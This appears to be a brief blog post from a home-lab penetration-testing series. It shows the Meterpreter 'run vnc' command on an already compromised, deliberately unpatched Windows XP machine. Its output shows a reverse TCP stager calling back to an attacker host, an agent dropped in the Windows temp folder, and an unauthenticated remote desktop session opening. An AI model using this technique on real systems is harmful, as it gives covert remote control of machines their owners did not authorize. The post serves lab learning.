This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:
Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.
This is very cool. The following installs a VNC session on the exploited Windows system and gives me a graphical interface window of the target desktop to manipulate as if I were sitting at the machine.
meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.70 LPORT=4545)
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\nMsMIPZFPZ.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.70:4545…
meterpreter > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name “lab”
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor. Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding
And up popped the target machine desktop:
